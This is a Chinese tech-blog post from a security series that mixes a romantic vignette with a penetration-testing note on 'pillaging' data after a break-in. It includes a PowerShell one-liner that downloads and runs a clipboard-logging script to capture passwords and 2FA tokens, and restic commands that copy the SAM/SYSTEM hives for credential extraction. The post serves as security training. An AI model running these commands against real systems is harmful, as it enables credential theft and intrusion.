iT邦幫忙

2025 iThome 鐵人賽

DAY 22
0

某次聚會的相遇


會場裡人聲鼎沸,
交談、笑聲堆疊在一起。

我坐在人群中,卻怎麼都覺得不適應。
空氣混雜著太多訊號,
像是一個被塞滿的系統日誌,
分不清哪些是有用的,哪些只是雜訊。

腦子一片嘈雜,只想快點離開。

我已經放空一陣子了,
突然聽到熟悉的聲音—

「妳怎麼在這裡?」

回頭一看,是那個熟悉到不得了的他。

我對他說:

「我還沒開始講話,能量早就耗盡了。」

他什麼也沒表示,
只是安靜地坐在我身邊一起發呆。

突然間,氣氛變得安靜許多,
緊繃感慢慢散去。

我忽然想到—

這陪伴就像 Pillaging。

他早已默默取得我的信任,
幫我把吵雜環境裡的碎片一一整理:

哪些能忽略,哪些該留下,把我心底那些細碎的不安慢慢收起。

這種感覺,好微妙,
卻也讓人好安心。


技術筆記:Pillaging

Pillaging(資訊掠奪),指的是在成功入侵一台系統之後,把裡面能找到的「有價值資訊」收集起來。

這些資訊可能包括:個人資料、信用卡資料、伺服器與網路架構細節、密碼、憑證或任何跟滲透測試、資安評估目標有關的敏感資訊。

為什麼要做這件事?

因為這些資訊就像下一步的「通關鑰匙」:

它們能幫助我們繼續滲透更深一層的網路,或達成在測試前期和客戶約定好的任務目標。

這些資料可能散落在各種地方—

應用程式、服務、裝置裡,而且存放格式各異。很多時候,我們需要用特定的工具,才能把它們成功提取出來。

了解資料來源有哪些?

以下是一些可能蒐集資訊的來源:

  • 已安裝的應用程式/服務、資料庫、目錄服務(AD、Azure AD 等)、共享的檔案、DNS、憑證頒發機構(CA)、監控與日誌系統、備份、鍵盤側錄、網路流量擷取、歷史檔案、有趣文件(password./pass. 等)、角色與權限、網頁瀏覽器、即時通訊(IM)客戶端等等。

任何能提供目標資訊的東西都很有價值 ~ 大家可以想想看:

根據企業規模、用途與測試範疇,我們有可能會遇到哪些資料?
熟悉常見應用、伺服器軟體與中介軟體有哪些?
需要了解一點:因為它們的資料格式與位置都不同,有時需要特殊工具才能提取或讀取。

我們先從比較簡單的地方看起,如 Clipboard、角色與服務 ~

剪貼簿(Clipboard)

使用者從密碼管理器貼上帳號/密碼、2FA Token 時,剪貼簿內容也能被抓取。

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/inguardians/Invoke-Clipboard/master/Invoke-Clipboard.ps1')
Invoke-ClipboardLogger

這時,我們可以等候敏感資料出現:

https://portal.azure.com
Administrator@ctfboy.com
CTFBoy<3Pillaging!

需要注意的地方

有些環境不一定適用,如:

  • 隔離環境:CitrixVDI 或雲端桌面有時會禁用剪貼簿同步。

  • 應用程式層阻擋:某些密碼管理器(例如 1Password、Bitwarden)有選項「自動清除剪貼簿」,幾秒內就清掉敏感資訊。

  • 權限不足:如果我們只是在低權限 service 或別的帳號下跑程式,可能抓不到目標使用者的剪貼簿內容。

角色與服務(Roles and Services)

常見伺服器角色:

  • 檔案 / 列印伺服器

  • Web / 資料庫伺服器

  • 憑證頒發機構(CA)

  • 原始碼管理伺服器

  • 備份伺服器

  • 攻擊備份伺服器

備份系統通常需要高權限帳號(常是本機管理員)。
若取得備份系統,即可能存取所有被備份的資料。

範例工具:restic

restic 是一個跨平台備份工具(Linux/BSD/Mac/Windows)。

它會用 RESTIC_PASSWORD 環境變數作為儲存庫密碼,若沒設定,就會要求輸入。

初始化儲存庫:

restic.exe -r E:\restic2 init

建立備份:

$env:RESTIC_PASSWORD = 'Password'
restic.exe -r E:\restic2\ backup C:\SampleFolder

使用 VSS 備份系統檔案:

restic.exe -r E:\restic2\ backup C:\Windows\System32\config --use-fs-snapshot

若無權限 → 顯示 Access is denied,會建立「空殼備份」。

檢查快照:

restic.exe -r E:\restic2\ snapshots

列出所有快照。

還原快照:

restic.exe -r E:\restic2\ restore <ID> --target C:\Restore

還原目標目錄的資料。

延伸應用

透過備份可取得 SAM/SYSTEM hive、SSH Key、web.config 等敏感檔案。


小結

# 寫久了好像就習慣了,寫完繼續加班 QAQ

參考資源

HTB Academy - Windows Privilege Escalation - Pillaging: https://academy.hackthebox.com/module/67/section/1637


上一篇
DLL - 我們來從頭了解你!
下一篇
Windows Hardening - 很穩的他
系列文
Hack the Boyfriend: 為了 CTF 帥哥,我貢獻了我的肝臟26
圖片
  熱門推薦
圖片
{{ item.channelVendor }} | {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言